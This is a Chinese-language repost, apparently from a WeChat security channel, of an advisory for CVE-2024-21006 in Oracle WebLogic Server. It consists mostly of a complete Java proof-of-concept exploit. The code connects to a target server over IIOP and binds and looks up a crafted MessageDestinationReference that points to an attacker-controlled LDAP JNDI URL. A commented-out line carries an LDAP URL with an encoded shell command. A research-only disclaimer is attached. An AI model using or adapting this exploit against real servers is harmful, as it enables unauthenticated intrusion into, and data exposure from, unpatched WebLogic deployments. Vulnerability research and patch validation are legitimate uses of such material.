描述
Oracle Fusion Middleware(组件:Core)的 Oracle WebLogic Server 产品中存在漏洞。受影响的受支持版本为 12.2.1.4.0 和 14.1.1.0.0。易于利用的漏洞允许未经身份验证的攻击者通过 T3、IIOP 进行网络访问来破坏 Oracle WebLogic Server。成功攻击此漏洞可能会导致对关键数据的未经授权的访问或对所有 Oracle WebLogic Server 可访问数据的完全访问。CVSS 3.1 基本分数 7.5(保密影响)。CVSS 矢量:(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)。
POC:
package org.example;import weblogic.j2ee.descriptor.InjectionTargetBean;import weblogic.j2ee.descriptor.MessageDestinationRefBean;import javax.naming.*;import java.util.Hashtable;public class MessageDestinationReference {public static void main(String[] args) throws Exception {String ip = "192.168.31.69";String port = "7001";// String rmiurl = "ldap://192.168.0.103/cVLtcNoHML/Plain/Exec/eyJjbWQiOiJ0b3VjaCAvdG1wL3N1Y2Nlc3MxMjMifQ==";String rhost = String.format("iiop://%s:%s", ip, port);Hashtable<String, String> env = new Hashtable<String, String>();// add wlsserver/server/lib/weblogic.jar to classpath,else will error.env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");env.put(Context.PROVIDER_URL, rhost);Context context = new InitialContext(env);// Reference reference = new Reference("weblogic.application.naming.MessageDestinationObjectFactory","weblogic.application.naming.MessageDestinationObjectFactory","");weblogic.application.naming.MessageDestinationReference messageDestinationReference=new weblogic.application.naming.MessageDestinationReference(null, new MessageDestinationRefBean() {@Overridepublic String[] getDescriptions() {return new String[0];}@Overridepublic void addDescription(String s) {}@Overridepublic void removeDescription(String s) {}@Overridepublic void setDescriptions(String[] strings) {}@Overridepublic String getMessageDestinationRefName() {return null;}@Overridepublic void setMessageDestinationRefName(String s) {}@Overridepublic String getMessageDestinationType() {return "weblogic.application.naming.MessageDestinationReference";}@Overridepublic void setMessageDestinationType(String s) {}@Overridepublic String getMessageDestinationUsage() {return null;}@Overridepublic void setMessageDestinationUsage(String s) {}@Overridepublic String getMessageDestinationLink() {return null;}@Overridepublic void setMessageDestinationLink(String s) {}@Overridepublic String getMappedName() {return null;}@Overridepublic void setMappedName(String s) {}@Overridepublic InjectionTargetBean[] getInjectionTargets() {return new InjectionTargetBean[0];}@Overridepublic InjectionTargetBean createInjectionTarget() {return null;}@Overridepublic void destroyInjectionTarget(InjectionTargetBean injectionTargetBean) {}@Overridepublic String getLookupName() {return null;}@Overridepublic void setLookupName(String s) {}@Overridepublic String getId() {return null;}@Overridepublic void setId(String s) {}}, "ldap://127.0.0.1:1389/deserialJackson", null, null);context.bind("momika233",messageDestinationReference);context.lookup("momika233");}}
项目地址:
https://github.com/momika233/CVE-2024-21006
原文始发于微信公众号(Ots安全):CVE-2024-21006 Oracle WebLogic Server RCE POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论